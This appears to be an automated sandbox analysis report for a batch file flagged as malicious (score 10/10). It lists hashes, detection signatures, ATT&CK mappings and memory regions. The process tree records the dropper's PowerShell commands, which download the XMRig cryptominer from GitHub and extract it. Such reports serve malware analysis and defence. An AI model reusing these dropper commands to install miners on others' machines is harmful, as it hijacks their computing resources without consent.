Analysis

  • max time kernel
    119s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240215-en
  • resource tags

    arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system
  • submitted
    22-05-2024 02:54

General

  • Target

    5.bat

  • Size

    599B

  • MD5

    798b979417aa88e5323ead9be2d8425c

  • SHA1

    a54c5133c71afddf697f302b36bdb930c72852ce

  • SHA256

    f83d724987f9f4a0843c0b0abd01f3f5ceccbc8e7babad76c2639e1bef2fee07

  • SHA512

    a4f2ff598bc26b5ee7778b34b34aafd20e43f714c5f841b9fe73cdc6e1c3e47e44ffb94ff06ccd7dd263116201ff6754c956c1ea8f588acf6927f35446b5036b

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://github.com/xmrig/xmrig/releases/download/v6.21.3/xmrig-6.21.3-msvc-win64.zip

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\5.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2388
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/xmrig/xmrig/releases/download/v6.21.3/xmrig-6.21.3-msvc-win64.zip', 'xmrig-6.21.3-msvc-win64.zip')"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2224
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command "Expand-Archive -Path 'xmrig-6.21.3-msvc-win64.zip' -DestinationPath '.'"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2684

Network

MITRE ATT&CK Matrix ATT&CK v13

Execution

Command and Scripting Interpreter

1
T1059

PowerShell

1
T1059.001

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\D145POKDDRYYMZ7JGX7F.temp
    Filesize

    7KB

    MD5

    ff1ed6723b2933692faf245c52464835

    SHA1

    6aa3099e32bf731cb122606ae992b80fa49d42be

    SHA256

    b5b275281883edbf5c1ff54abecaefcdb5877b33c9d92f37bd5e7a96938763c1

    SHA512

    b50dea5ecae2cb22bc4e219cf432f5c6ff0edf9d30265fe4f3fc2fff0277f28ca177b03958f1687358b09e99be19056e7a9833f32c3e3e3635ca48e37237e647

  • memory/2224-4-0x000007FEF5DBE000-0x000007FEF5DBF000-memory.dmp
    Filesize

    4KB

  • memory/2224-6-0x000007FEF5B00000-0x000007FEF649D000-memory.dmp
    Filesize

    9.6MB

  • memory/2224-5-0x000000001B680000-0x000000001B962000-memory.dmp
    Filesize

    2.9MB

  • memory/2224-8-0x000007FEF5B00000-0x000007FEF649D000-memory.dmp
    Filesize

    9.6MB

  • memory/2224-7-0x0000000001F40000-0x0000000001F48000-memory.dmp
    Filesize

    32KB

  • memory/2224-9-0x000007FEF5B00000-0x000007FEF649D000-memory.dmp
    Filesize

    9.6MB

  • memory/2224-10-0x000007FEF5B00000-0x000007FEF649D000-memory.dmp
    Filesize

    9.6MB

  • memory/2224-11-0x000007FEF5B00000-0x000007FEF649D000-memory.dmp
    Filesize

    9.6MB

  • memory/2224-12-0x000007FEF5B00000-0x000007FEF649D000-memory.dmp
    Filesize

    9.6MB

  • memory/2684-18-0x000000001B600000-0x000000001B8E2000-memory.dmp
    Filesize

    2.9MB

  • memory/2684-19-0x0000000002310000-0x0000000002318000-memory.dmp
    Filesize

    32KB